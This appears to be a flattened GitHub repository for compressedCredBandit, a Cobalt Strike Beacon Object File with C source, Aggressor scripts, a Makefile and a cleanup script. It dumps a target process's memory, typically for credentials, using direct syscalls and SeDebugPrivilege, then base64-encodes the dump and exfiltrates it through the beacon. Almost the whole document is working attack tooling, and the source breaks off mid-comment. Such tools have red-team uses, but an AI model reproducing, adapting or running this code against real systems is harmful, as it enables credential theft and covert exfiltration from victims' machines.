├── .gitignore ├── README.md ├── compressedCredBandit ├── RevertMiniDumpWriteDump.cna ├── cleanupMiniDump.sh └── compressedCredBandit.cna └── src ├── Makefile ├── compressedCredBandit.c └── include ├── beacon.h ├── compressedCredBandit.h ├── syscalls-asm.h └── syscalls.h /.gitignore: -------------------------------------------------------------------------------- 1 | # Prerequisites 2 | *.d 3 | 4 | # Object files 5 | *.o 6 | *.ko 7 | *.obj 8 | *.elf 9 | 10 | # Linker output 11 | *.ilk 12 | *.map 13 | *.exp 14 | 15 | # Precompiled Headers 16 | *.gch 17 | *.pch 18 | 19 | # Libraries 20 | *.lib 21 | *.a 22 | *.la 23 | *.lo 24 | 25 | # Shared objects (inc. Windows DLLs) 26 | *.dll 27 | *.so 28 | *.so.* 29 | *.dylib 30 | 31 | # Executables 32 | *.exe 33 | *.out 34 | *.app 35 | *.i*86 36 | *.x86_64 37 | *.hex 38 | 39 | # Debug files 40 | *.dSYM/ 41 | *.su 42 | *.idb 43 | *.pdb 44 | 45 | # Kernel Module Compile Results 46 | *.mod* 47 | *.cmd 48 | .tmp_versions/ 49 | modules.order 50 | Module.symvers 51 | Mkfile.old 52 | dkms.conf 53 | 54 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # compressedCredBandit 2 | 3 | compressedCredBandit is a modified version of [anthemtotheego's](https://github.com/anthemtotheego) proof of concept Beacon Object File (BOF). This version does all that the original did with the addition of compressing the data to reduce the size of the dump that must be transfered. 4 | 5 | See the original project for additional details: 6 | - [https://github.com/anthemtotheego/CredBandit](https://github.com/anthemtotheego/CredBandit) 7 | 8 | ## Building the project 9 | ``` 10 | cd src 11 | make 12 | ``` 13 | 14 | ## Syntax 15 | 16 | Dump to cs console: 17 | ``` 18 | compressedCredDump [PID] 19 | ``` 20 | 21 | Dump to file on remote system: 22 | ``` 23 | compressedCredDump [PID] [PATH] 24 | ``` 25 | 26 | ## Clean-Up 27 | 28 | Use the cleanupMiniDump.sh Script to clean up the retrieved file, which should be in the root of your teamserver's directory. 29 | 30 | 1. Copy the dumpFile.txt file to a working directory. 31 | 2. Run the cleanupMiniDump.sh script and specify the path to the dump file. 32 | ``` 33 | cleanupMiniDump.sh [PATH] 34 | ``` 35 | 3. Use the decompress Visual Studio project to decompress the dump file. 36 | -------------------------------------------------------------------------------- /compressedCredBandit/RevertMiniDumpWriteDump.cna: -------------------------------------------------------------------------------- 1 | #set ouput back to normal 2 | set BEACON_OUTPUT { 3 | 4 | return "\c9[+]\o " . replace($2, "([a-z]):\n", "\$1\cE:\n\o", 1); 5 | 6 | } 7 | -------------------------------------------------------------------------------- /compressedCredBandit/cleanupMiniDump.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | if [ -z "$1" ] 4 | then 5 | echo "You must specify the path to the dump file to cleanup." 6 | exit 1 7 | fi 8 | 9 | dumpFile = $1 10 | 11 | #Create a backup copy if things get messed up 12 | cp "${dumpFile}" $(date +"%Y_%m_%d_%I_%M_%p").txt 13 | 14 | #Remove Cobalt Strikes received output: strings from miniDump 15 | sed -i -e 's/received output://g' "${dumpFile}" 16 | 17 | #Trim whitespaces from miniDump 18 | cat "${dumpFile}" | tr -d " \t\n\r" > "temp_${dumpFile}" 19 | 20 | #Base64 decode miniDump file and create final miniDump file 21 | base64 -d "temp_${dumpFile}" > $(date +"%Y_%m_%d_%I_%M_%p").dmp 22 | 23 | #Remove extra files 24 | rm "${dumpFile}" 25 | rm "temp_${dumpFile}" 26 | 27 | -------------------------------------------------------------------------------- /compressedCredBandit/compressedCredBandit.cna: -------------------------------------------------------------------------------- 1 | #Register command 2 | beacon_command_register( 3 | "compressedCredBandit", 4 | "runs an all in memory custom MiniDumpWriteDump implementation using static x64 syscalls and exfiltrates the data back through your beacon or can write to disk.", 5 | "Synopsis: compressedCredBandit [targit PID] [optional dump file path]"); 6 | alias compressedCredBandit { 7 | local('$barch $handle $data $args'); 8 | 9 | # figure out the arch of this session 10 | $barch = barch($1); 11 | 12 | # read in the right BOF file 13 | $handle = openf(script_resource("compressedCredBandit. $+ $barch $+ .o")); 14 | $data = readb($handle, -1); 15 | closef($handle); 16 | if(size(@_) < 2) 17 | { 18 | berror($1, "Incorrect usage!"); 19 | berror($1, beacon_command_detail("compressedCredBandit")); 20 | return; 21 | } 22 | 23 | # pack our arguments 24 | $args = bof_pack($1, "iz", $2, $3); 25 | 26 | # announce what we're doing 27 | btask($1, "Running compressedCredBandit by @xenoscr based on credBandit by (@anthemtotheego)"); 28 | 29 | # execute it. 30 | beacon_inline_execute($1, $data, "go", $args); 31 | } 32 | 33 | 34 | #Grab output and write to file 35 | set BEACON_OUTPUT { 36 | local('$handle'); 37 | 38 | $length = strlen($2); 39 | 40 | if ( $length > 100 ) { 41 | 42 | $handle = openf(">> dumpFile.txt"); 43 | writeb($handle, $2); 44 | closef($handle); 45 | } 46 | #else if ( $length = 18 ) {# Leaving this here if you want to try and add automation of the cleanup script 47 | 48 | # exec(script_resource("./cleanupMiniDump.sh")); 49 | # return "\c9[+]\o " . replace($2, "([a-z]):\n", "\$1\cE:\n\o", 1); 50 | #} 51 | else { 52 | return "\c9[+]\o " . replace($2, "([a-z]):\n", "\$1\cE:\n\o", 1); 53 | }; 54 | } 55 | 56 | 57 | -------------------------------------------------------------------------------- /src/Makefile: -------------------------------------------------------------------------------- 1 | BOFNAME := compressedCredBandit 2 | COMINCLUDE := -I ./include 3 | LIBINCLUDE := 4 | CC_x64 := x86_64-w64-mingw32-gcc 5 | CC=x86_64-w64-mingw32-clang 6 | 7 | all: 8 | $(CC_x64) -o $(BOFNAME).x64.o $(COMINCLUDE) -Os -c $(BOFNAME).c -DBOF -masm=intel 9 | mv $(BOFNAME)*.o ../$(BOFNAME) 10 | 11 | test: 12 | $(CC_x64) $(BOFNAME).c -g $(COMINCLUDE) $(LIBINCLUDE) -o $(BOFNAME).x64.exe -masm=intel 13 | 14 | scanbuild: 15 | $(CC) $(BOFNAME).c -o $(BOFNAME).scanbuild.exe $(COMINCLUDE) $(LIBINCLUDE) -masm=intel 16 | 17 | check: 18 | cppcheck --enable=all $(COMINCLUDE) --platform=win64 $(BOFNAME).c 19 | 20 | clean: 21 | rm $(BOFNAME).*.exe 22 | -------------------------------------------------------------------------------- /src/compressedCredBandit.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include "compressedCredBandit.h" 6 | #include "syscalls.h" 7 | #include "beacon.h" 8 | 9 | //Base64 encode 10 | char* base64_encode(const unsigned char *data, size_t input_length, size_t *output_length) { 11 | 12 | static char encoding_table[] = { 13 | 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 14 | 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 15 | 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 16 | 'Y', 'Z', 'a', 'b', 'c', 'd', 'e', 'f', 17 | 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 18 | 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 19 | 'w', 'x', 'y', 'z', '0', '1', '2', '3', 20 | '4', '5', '6', '7', '8', '9', '+', '/' 21 | }; 22 | 23 | static int mod_table[] = { 0, 2, 1 }; 24 | 25 | *output_length = 4 * ((input_length + 2) / 3); 26 | 27 | char *encoded_data = MSVCRT$malloc(*output_length); 28 | if (encoded_data == NULL) return NULL; 29 | 30 | for (int i = 0, j = 0; i < input_length;) { 31 | 32 | unsigned int octet_a = i < input_length ? (unsigned char)data[i++] : 0; 33 | unsigned int octet_b = i < input_length ? (unsigned char)data[i++] : 0; 34 | unsigned int octet_c = i < input_length ? (unsigned char)data[i++] : 0; 35 | 36 | unsigned int triple = (octet_a << 0x10) + (octet_b << 0x08) + octet_c; 37 | 38 | encoded_data[j++] = encoding_table[(triple >> 3 * 6) & 0x3F]; 39 | encoded_data[j++] = encoding_table[(triple >> 2 * 6) & 0x3F]; 40 | encoded_data[j++] = encoding_table[(triple >> 1 * 6) & 0x3F]; 41 | encoded_data[j++] = encoding_table[(triple >> 0 * 6) & 0x3F]; 42 | } 43 | 44 | for (int i = 0; i < mod_table[input_length % 3]; i++) 45 | encoded_data[*output_length - 1 - i] = '='; 46 | 47 | return encoded_data; 48 | } 49 | 50 | /*Begin MiniDumpWriteDump reactOS Code*/ 51 | 52 | static BOOL fetch_process_info(struct dump_context* dc) 53 | { 54 | ULONG buf_size = 0x1000; 55 | NTSTATUS nts; 56 | SYSTEM_PROCESS_INFORMATION* pcs_buffer; 57 | 58 | if (!(pcs_buffer = (SYSTEM_PROCESS_INFORMATION*)KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, buf_size))) return FALSE; 59 | for (;;) 60 | { 61 | nts = NtQuerySystemInformation(SystemProcessInformation, 62 | pcs_buffer, buf_size, NULL); 63 | if (nts != 0xC0000004L) break; 64 | pcs_buffer = (SYSTEM_PROCESS_INFORMATION*)KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), 0, pcs_buffer, buf_size *= 2); 65 | if (!pcs_buffer) return FALSE; 66 | } 67 | 68 | if (nts == 0) 69 | { 70 | SYSTEM_PROCESS_INFORMATION* spi = pcs_buffer; 71 | 72 | for (;;) 73 | { 74 | if (HandleToUlong(spi->UniqueProcessId) == dc->pid) 75 | { 76 | dc->num_threads = spi->NumberOfThreads; 77 | dc->threads = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, 78 | dc->num_threads * sizeof(dc->threads[0])); 79 | if (!dc->threads) goto failed; 80 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pcs_buffer); 81 | return TRUE; 82 | } 83 | if (!spi->NextEntryOffset) break; 84 | spi = (SYSTEM_PROCESS_INFORMATION*)((char*)spi + spi->NextEntryOffset); 85 | } 86 | } 87 | failed: 88 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, pcs_buffer); 89 | return FALSE; 90 | } 91 | 92 | static void writeat(struct dump_context* dc, RVA rva, const void* data, unsigned size) 93 | { 94 | DWORD written; 95 | 96 | KERNEL32$SetFilePointer(dc->hFile, rva, NULL, FILE_BEGIN); 97 | KERNEL32$WriteFile(dc->hFile, data, size, &written, NULL); 98 | } 99 | 100 | static void append(struct dump_context* dc, const void* data, unsigned size) 101 | { 102 | writeat(dc, dc->rva, data, size); 103 | dc->rva += size; 104 | } 105 | 106 | static unsigned dump_system_info(struct dump_context* dc) 107 | { 108 | MINIDUMP_SYSTEM_INFO mdSysInfo; 109 | SYSTEM_INFO sysInfo; 110 | OSVERSIONINFOW osInfo; 111 | DWORD written; 112 | ULONG slen; 113 | DWORD wine_extra = 0; 114 | 115 | const char* build_id = NULL; 116 | const char* sys_name = NULL; 117 | const char* release_name = NULL; 118 | 119 | KERNEL32$GetSystemInfo(&sysInfo); 120 | osInfo.dwOSVersionInfoSize = sizeof(osInfo); 121 | 122 | typedef int(WINAPI* RtlGetNtVersionNumbers)(PDWORD, PDWORD, PDWORD); 123 | 124 | HINSTANCE hinst = LoadLibrary("ntdll.dll"); 125 | DWORD dwMajor, dwMinor, dwBuildNumber; 126 | RtlGetNtVersionNumbers proc = (RtlGetNtVersionNumbers)GetProcAddress(hinst, "RtlGetNtVersionNumbers"); 127 | proc(&dwMajor, &dwMinor, &dwBuildNumber); 128 | dwBuildNumber &= 0xffff; 129 | BeaconPrintf(CALLBACK_OUTPUT, "[+] OS Version: %d.%d.%d\n", dwMajor, dwMinor, dwBuildNumber); 130 | FreeLibrary(hinst); 131 | 132 | mdSysInfo.ProcessorArchitecture = sysInfo.wProcessorArchitecture; 133 | mdSysInfo.ProcessorLevel = sysInfo.wProcessorLevel; 134 | mdSysInfo.ProcessorRevision = sysInfo.wProcessorRevision; 135 | mdSysInfo.NumberOfProcessors = (UCHAR)sysInfo.dwNumberOfProcessors; 136 | mdSysInfo.ProductType = VER_NT_WORKSTATION; /* This might need fixing */ 137 | mdSysInfo.MajorVersion = dwMajor; 138 | mdSysInfo.MinorVersion = dwMinor; 139 | mdSysInfo.BuildNumber = dwBuildNumber; 140 | mdSysInfo.PlatformId = 0x2; 141 | 142 | mdSysInfo.CSDVersionRva = dc->rva + sizeof(mdSysInfo) + wine_extra; 143 | mdSysInfo.Reserved1 = 0; 144 | mdSysInfo.SuiteMask = VER_SUITE_TERMINAL; 145 | 146 | unsigned i; 147 | ULONG64 one = 1; 148 | 149 | mdSysInfo.Cpu.OtherCpuInfo.ProcessorFeatures[0] = 0; 150 | mdSysInfo.Cpu.OtherCpuInfo.ProcessorFeatures[1] = 0; 151 | 152 | for (i = 0; i < sizeof(mdSysInfo.Cpu.OtherCpuInfo.ProcessorFeatures[0]) * 8; i++) 153 | if (KERNEL32$IsProcessorFeaturePresent(i)) 154 | mdSysInfo.Cpu.OtherCpuInfo.ProcessorFeatures[0] |= one << i; 155 | 156 | append(dc, &mdSysInfo, sizeof(mdSysInfo)); 157 | 158 | const WCHAR* szCSDVersion = L""; 159 | slen = KERNEL32$lstrlenW(szCSDVersion) * sizeof(WCHAR); 160 | KERNEL32$WriteFile(dc->hFile, &slen, sizeof(slen), &written, NULL); 161 | KERNEL32$WriteFile(dc->hFile, szCSDVersion, slen, &written, NULL); 162 | dc->rva += sizeof(ULONG) + slen; 163 | 164 | return sizeof(mdSysInfo); 165 | } 166 | 167 | void minidump_add_memory_block(struct dump_context* dc, ULONG64 base, ULONG size, ULONG rva) 168 | { 169 | if (!dc->mem) 170 | { 171 | dc->alloc_mem = 32; 172 | dc->mem = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, dc->alloc_mem * sizeof(*dc->mem)); 173 | } 174 | else if (dc->num_mem >= dc->alloc_mem) 175 | { 176 | dc->alloc_mem *= 2; 177 | dc->mem = KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), 0, dc->mem, 178 | dc->alloc_mem * sizeof(*dc->mem)); 179 | } 180 | if (dc->mem) 181 | { 182 | dc->mem[dc->num_mem].base = base; 183 | dc->mem[dc->num_mem].size = size; 184 | dc->mem[dc->num_mem].rva = rva; 185 | dc->num_mem++; 186 | } 187 | else dc->num_mem = dc->alloc_mem = 0; 188 | } 189 | 190 | 191 | static void minidump_add_memory64_block(struct dump_context* dc, ULONG64 base, ULONG64 size) 192 | { 193 | if (!dc->mem64) 194 | { 195 | dc->alloc_mem64 = 32; 196 | dc->mem64 = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, dc->alloc_mem64 * sizeof(*dc->mem64)); 197 | } 198 | else if (dc->num_mem64 >= dc->alloc_mem64) 199 | { 200 | dc->alloc_mem64 *= 2; 201 | dc->mem64 = KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), 0, dc->mem64, 202 | dc->alloc_mem64 * sizeof(*dc->mem64)); 203 | } 204 | if (dc->mem64) 205 | { 206 | dc->mem64[dc->num_mem64].base = base; 207 | dc->mem64[dc->num_mem64].size = size; 208 | dc->num_mem64++; 209 | } 210 | else dc->num_mem64 = dc->alloc_mem64 = 0; 211 | } 212 | 213 | static void fetch_memory64_info(struct dump_context* dc) 214 | { 215 | ULONG_PTR addr; 216 | MEMORY_BASIC_INFORMATION mbi; 217 | 218 | addr = 0; 219 | while (KERNEL32$VirtualQueryEx(dc->handle, (LPCVOID)addr, &mbi, sizeof(mbi)) != 0) 220 | { 221 | /* Memory regions with state MEM_COMMIT will be added to the dump */ 222 | if (mbi.State == MEM_COMMIT) 223 | { 224 | minidump_add_memory64_block(dc, (ULONG_PTR)mbi.BaseAddress, mbi.RegionSize); 225 | } 226 | 227 | if ((addr + mbi.RegionSize) < addr) 228 | break; 229 | 230 | addr = (ULONG_PTR)mbi.BaseAddress + mbi.RegionSize; 231 | } 232 | } 233 | 234 | static inline BOOL read_process_memory(HANDLE process, UINT64 addr, void* buf, size_t size) 235 | { 236 | SIZE_T read = 0; 237 | NTSTATUS res = NtReadVirtualMemory(process, (PVOID*)addr, buf, size, &read); 238 | return !res; 239 | } 240 | 241 | static unsigned dump_memory64_info(struct dump_context* dc) 242 | { 243 | MINIDUMP_MEMORY64_LIST mdMem64List; 244 | MINIDUMP_MEMORY_DESCRIPTOR64 mdMem64; 245 | DWORD written; 246 | unsigned i, len, sz; 247 | RVA rva_base; 248 | char tmp[1024]; 249 | ULONG64 pos; 250 | LARGE_INTEGER filepos; 251 | 252 | sz = sizeof(mdMem64List.NumberOfMemoryRanges) + 253 | sizeof(mdMem64List.BaseRva) + 254 | dc->num_mem64 * sizeof(mdMem64); 255 | 256 | mdMem64List.NumberOfMemoryRanges = dc->num_mem64; 257 | mdMem64List.BaseRva = dc->rva + sz; 258 | 259 | append(dc, &mdMem64List.NumberOfMemoryRanges, 260 | sizeof(mdMem64List.NumberOfMemoryRanges)); 261 | append(dc, &mdMem64List.BaseRva, 262 | sizeof(mdMem64List.BaseRva)); 263 | 264 | rva_base = dc->rva; 265 | dc->rva += dc->num_mem64 * sizeof(mdMem64); 266 | 267 | /* dc->rva is not updated past this point. The end of the dump 268 | * is just the full memory data. */ 269 | filepos.QuadPart = dc->rva; 270 | for (i = 0; i < dc->num_mem64; i++) 271 | { 272 | mdMem64.StartOfMemoryRange = dc->mem64[i].base; 273 | mdMem64.DataSize = dc->mem64[i].size; 274 | KERNEL32$SetFilePointerEx(dc->hFile, filepos, NULL, FILE_BEGIN); 275 | for (pos = 0; pos < dc->mem64[i].size; pos += sizeof(tmp)) 276 | { 277 | len = (unsigned)(min(dc->mem64[i].size - pos, sizeof(tmp))); 278 | if (read_process_memory(dc->handle, dc->mem64[i].base + pos, tmp, len)) 279 | KERNEL32$WriteFile(dc->hFile, tmp, len, &written, NULL); 280 | } 281 | filepos.QuadPart += mdMem64.DataSize; 282 | writeat(dc, rva_base + i * sizeof(mdMem64), &mdMem64, sizeof(mdMem64)); 283 | } 284 | 285 | return sz; 286 | } 287 | 288 | static void fetch_module_versioninfo(LPCWSTR filename, VS_FIXEDFILEINFO* ffi) 289 | { 290 | DWORD handle; 291 | DWORD sz; 292 | static const WCHAR backslashW[] = { '\\', '\0' }; 293 | 294 | MSVCRT$memset(ffi, 0, sizeof(*ffi)); 295 | if ((sz = VERSION$GetFileVersionInfoSizeW(filename, &handle))) 296 | { 297 | void* info = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, sz); 298 | if (info && VERSION$GetFileVersionInfoW(filename, handle, sz, info)) 299 | { 300 | VS_FIXEDFILEINFO* ptr; 301 | UINT len; 302 | 303 | if (VERSION$VerQueryValueW(info, backslashW, (LPVOID*)&ptr, &len)) 304 | MSVCRT$memcpy(ffi, ptr, min(len, sizeof(*ffi))); 305 | } 306 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, info); 307 | } 308 | } 309 | 310 | static unsigned dump_modules(struct dump_context* dc, BOOL dump_elf) 311 | { 312 | MINIDUMP_MODULE mdModule; 313 | MINIDUMP_MODULE_LIST mdModuleList; 314 | char tmp[1024]; 315 | MINIDUMP_STRING* ms = (MINIDUMP_STRING*)tmp; 316 | ULONG i, nmod; 317 | RVA rva_base; 318 | DWORD flags_out; 319 | unsigned sz; 320 | 321 | for (i = nmod = 0; i < dc->num_modules; i++) 322 | { 323 | if ((dc->modules[i].is_elf && dump_elf) || 324 | (!dc->modules[i].is_elf && !dump_elf)) 325 | nmod++; 326 | } 327 | 328 | mdModuleList.NumberOfModules = 0; 329 | rva_base = dc->rva; 330 | dc->rva += sz = sizeof(mdModuleList.NumberOfModules) + sizeof(mdModule) * nmod; 331 | 332 | for (i = 0; i < dc->num_modules; i++) 333 | { 334 | if ((dc->modules[i].is_elf && !dump_elf) || 335 | (!dc->modules[i].is_elf && dump_elf)) 336 | continue; 337 | 338 | flags_out = ModuleWriteModule | ModuleWriteMiscRecord | ModuleWriteCvRecord; 339 | if (dc->type & MiniDumpWithDataSegs) 340 | flags_out |= ModuleWriteDataSeg; 341 | if (dc->type & MiniDumpWithProcessThreadData) 342 | flags_out |= ModuleWriteTlsData; 343 | if (dc->type & MiniDumpWithCodeSegs) 344 | flags_out |= ModuleWriteCodeSegs; 345 | 346 | ms->Length = (KERNEL32$lstrlenW(dc->modules[i].name) + 1) * sizeof(WCHAR); 347 | 348 | KERNEL32$lstrcpyW(ms->Buffer, dc->modules[i].name); 349 | 350 | if (flags_out & ModuleWriteModule) 351 | { 352 | mdModule.BaseOfImage = dc->modules[i].base; 353 | mdModule.SizeOfImage = dc->modules[i].size; 354 | mdModule.CheckSum = dc->modules[i].checksum; 355 | mdModule.TimeDateStamp = dc->modules[i].timestamp; 356 | mdModule.ModuleNameRva = dc->rva; 357 | ms->Length -= sizeof(WCHAR); 358 | append(dc, ms, sizeof(ULONG) + ms->Length + sizeof(WCHAR)); 359 | fetch_module_versioninfo(ms->Buffer, &mdModule.VersionInfo); 360 | mdModule.CvRecord.DataSize = 0; 361 | mdModule.CvRecord.Rva = 0; 362 | mdModule.MiscRecord.DataSize = 0; 363 | mdModule.MiscRecord.Rva = 0; 364 | mdModule.Reserved0 = 0; 365 | mdModule.Reserved1 = 0; 366 | writeat(dc, 367 | rva_base + sizeof(mdModuleList.NumberOfModules) + 368 | mdModuleList.NumberOfModules++ * sizeof(mdModule), 369 | &mdModule, sizeof(mdModule)); 370 | } 371 | } 372 | writeat(dc, rva_base, &mdModuleList.NumberOfModules, 373 | sizeof(mdModuleList.NumberOfModules)); 374 | 375 | return sz; 376 | } 377 | 378 | BOOL validate_addr64(DWORD64 addr) 379 | { 380 | if (sizeof(void*) == sizeof(int) && (addr >> 32)) 381 | { 382 | SetLastError(ERROR_INVALID_PARAMETER); 383 | return FALSE; 384 | } 385 | return TRUE; 386 | } 387 | 388 | BOOL pe_load_nt_header(HANDLE hProc, DWORD64 base, IMAGE_NT_HEADERS* nth) 389 | { 390 | IMAGE_DOS_HEADER dos; 391 | 392 | NTSTATUS res = NtReadVirtualMemory(hProc, (PVOID*)(DWORD_PTR)base, &dos, sizeof(dos), NULL); 393 | 394 | NTSTATUS res2 = NtReadVirtualMemory(hProc, (PVOID*)(DWORD_PTR)(base + dos.e_lfanew), nth, sizeof(*nth), NULL); 395 | 396 | return !res && dos.e_magic == IMAGE_DOS_SIGNATURE && !res2 && nth->Signature == IMAGE_NT_SIGNATURE; 397 | } 398 | 399 | static BOOL add_module(struct dump_context* dc, const WCHAR* name, 400 | DWORD64 base, DWORD size, DWORD timestamp, DWORD checksum, 401 | BOOL is_elf) 402 | { 403 | if (!dc->modules) 404 | { 405 | dc->alloc_modules = 32; 406 | dc->modules = KERNEL32$HeapAlloc(KERNEL32$GetProcessHeap(), 0, 407 | dc->alloc_modules * sizeof(*dc->modules)); 408 | } 409 | else if (dc->num_modules >= dc->alloc_modules) 410 | { 411 | dc->alloc_modules *= 2; 412 | dc->modules = KERNEL32$HeapReAlloc(KERNEL32$GetProcessHeap(), 0, dc->modules, 413 | dc->alloc_modules * sizeof(*dc->modules)); 414 | } 415 | if (!dc->modules) 416 | { 417 | dc->alloc_modules = dc->num_modules = 0; 418 | return FALSE; 419 | } 420 | 421 | PSAPI$GetModuleFileNameExW(dc->handle, (HMODULE)(DWORD_PTR)base, dc->modules[dc->num_modules].name, ARRAY_SIZE(dc->modules[dc->num_modules].name)); 422 | 423 | dc->modules[dc->num_modules].base = base; 424 | dc->modules[dc->num_modules].size = size; 425 | dc->modules[dc->num_modules].timestamp = timestamp; 426 | dc->modules[dc->num_modules].checksum = checksum; 427 | dc->modules[dc->num_modules].is_elf = is_elf; 428 | dc->num_modules++; 429 | 430 | return TRUE; 431 | } 432 | 433 | 434 | static BOOL WINAPI fetch_pe_module_info_cb(PCWSTR name, DWORD64 base, ULONG size, 435 | PVOID user) 436 | { 437 | struct dump_context* dc = user; 438 | IMAGE_NT_HEADERS nth; 439 | 440 | if (!validate_addr64(base)) return FALSE; 441 | 442 | if (pe_load_nt_header(dc->handle, base, &nth)) 443 | add_module(user, name, base, size, 444 | nth.FileHeader.TimeDateStamp, nth.OptionalHeader.CheckSum, 445 | FALSE); 446 | 447 | return TRUE; 448 | } 449 | 450 | 451 | static void fetch_modules_info(struct dump_context* dc) 452 | { 453 | DBGHELP$EnumerateLoadedModulesW64(dc->handle, fetch_pe_module_info_cb, dc); 454 | } 455 | 456 | BOOL MiniDumpWriteDumpA(HANDLE hProcess, DWORD pid, HANDLE hFile) 457 | { 458 | static const MINIDUMP_DIRECTORY emptyDir = { UnusedStream, {0, 0} }; 459 | MINIDUMP_HEADER mdHead; 460 | MINIDUMP_DIRECTORY mdDir; 461 | DWORD i, nStreams, idx_stream; 462 | struct dump_context dc; 463 | BOOL sym_initialized = FALSE; 464 | 465 | const DWORD Flags = MiniDumpWithFullMemory | 466 | MiniDumpWithFullMemoryInfo | 467 | MiniDumpWithUnloadedModules; 468 | 469 | MINIDUMP_TYPE DumpType = (MINIDUMP_TYPE)Flags; 470 | 471 | if (!(sym_initialized = DBGHELP$SymInitializeW(hProcess, NULL, TRUE))) 472 | { 473 | DWORD err = KERNEL32$GetLastError(); 474 | return FALSE; 475 | } 476 | 477 | dc.hFile = hFile; 478 | dc.pid = pid; 479 | dc.handle = hProcess; 480 | dc.modules = NULL; 481 | dc.num_modules = 0; 482 | dc.alloc_modules = 0; 483 | dc.threads = NULL; 484 | dc.num_threads = 0; 485 | dc.type = DumpType; 486 | dc.mem = NULL; 487 | dc.num_mem = 0; 488 | dc.alloc_mem = 0; 489 | dc.mem64 = NULL; 490 | dc.num_mem64 = 0; 491 | dc.alloc_mem64 = 0; 492 | dc.rva = 0; 493 | 494 | if (!fetch_process_info(&dc)) return FALSE; 495 | 496 | fetch_modules_info(&dc); 497 | 498 | nStreams = 3; 499 | nStreams = (nStreams + 3) & ~3; 500 | 501 | // Write Header 502 | mdHead.Signature = MINIDUMP_SIGNATURE; 503 | mdHead.Version = MINIDUMP_VERSION; 504 | mdHead.NumberOfStreams = nStreams; 505 | mdHead.CheckSum = 0; 506 | mdHead.StreamDirectoryRva = sizeof(mdHead); 507 | //mdHead.TimeDateStamp = time(NULL); 508 | mdHead.Flags = DumpType; 509 | append(&dc, &mdHead, sizeof(mdHead)); 510 | 511 | // Write Stream Directories 512 | dc.rva += nStreams * sizeof(mdDir); 513 | idx_stream = 0; 514 | 515 | // Write Data Stream Directories 516 | // 517 | 518 | // Must be first in MiniDump 519 | mdDir.StreamType = SystemInfoStream; 520 | mdDir.Location.Rva = dc.rva; 521 | mdDir.Location.DataSize = dump_system_info(&dc); 522 | writeat(&dc, mdHead.StreamDirectoryRva + idx_stream++ * sizeof(mdDir), 523 | &mdDir, sizeof(mdDir)); 524 | 525 | mdDir.StreamType = ModuleListStream; 526 | mdDir.Location.Rva = dc.rva; 527 | mdDir.Location.DataSize = dump_modules(&dc, FALSE); 528 | writeat(&dc, mdHead.StreamDirectoryRva + idx_stream++ * sizeof(mdDir), 529 | &mdDir, sizeof(mdDir)); 530 | 531 | fetch_memory64_info(&dc); 532 | 533 | mdDir.StreamType = Memory64ListStream; 534 | mdDir.Location.Rva = dc.rva; 535 | mdDir.Location.DataSize = dump_memory64_info(&dc); 536 | writeat(&dc, mdHead.StreamDirectoryRva + idx_stream++ * sizeof(mdDir), 537 | &mdDir, sizeof(mdDir)); 538 | 539 | // fill the remaining directory entries with 0's (unused stream types) 540 | // NOTE: this should always come last in the dump! 541 | for (i = idx_stream; i < nStreams; i++) 542 | writeat(&dc, mdHead.StreamDirectoryRva + i * sizeof(emptyDir), &emptyDir, sizeof(emptyDir)); 543 | 544 | if (sym_initialized) 545 | DBGHELP$SymCleanup(hProcess); 546 | 547 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, dc.mem); 548 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, dc.mem64); 549 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, dc.modules); 550 | KERNEL32$HeapFree(KERNEL32$GetProcessHeap(), 0, dc.threads); 551 | 552 | return TRUE; 553 | } 554 | 555 | void EnableDebugPriv() 556 | { 557 | HANDLE hToken; 558 | TOKEN_PRIVILEGES tkp; 559 | NTSTATUS status = NtOpenProcessToken(NtCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &hToken); 560 | 561 | if(status != STATUS_SUCCESS){ 562 | BeaconPrintf(CALLBACK_ERROR, "Failed to open process token\n"); 563 | } 564 | 565 | tkp.PrivilegeCount = 1; 566 | tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 567 | 568 | LPCWSTR lpwPriv = L"SeDebugPrivilege"; 569 | if (!ADVAPI32$LookupPrivilegeValueW(NULL, lpwPriv, &tkp.Privileges[0].Luid)) { 570 | NtClose(hToken); 571 | } 572 | 573 | status = NtAdjustPrivilegesToken(hToken, FALSE, &tkp, sizeof(TOKEN_PRIVILEGES), NULL, NULL); 574 | 575 | if (status != STATUS_SUCCESS){ 576 | BeaconPrintf(CALLBACK_ERROR, "Failed to adjust process token"); 577 | } 578 | 579 | NtClose(hToken); 580 | } 581 | 582 | HANDLE GetProcessHandle(DWORD dwPid) { 583 | 584 | NTSTATUS status; 585 | HANDLE hProcess = NULL; 586 | OBJECT_ATTRIBUTES ObjectAttributes; 587 | 588 | InitializeObjectAttributes(&ObjectAttributes, NULL, 0, NULL, NULL); 589 | CLIENT_ID uPid = { 0 }; 590 | 591 | uPid.UniqueProcess = (HANDLE)(DWORD_PTR)dwPid; 592 | uPid.UniqueThread = (HANDLE)0; 593 | 594 | status = NtOpenProcess(&hProcess, PROCESS_QUERY_INFORMATION | PROCESS_VM_READ, &ObjectAttributes, &uPid); 595 | if (hProcess == NULL) { 596 | return NULL; 597 | } 598 | 599 | return hProcess; 600 | } 601 | /*End 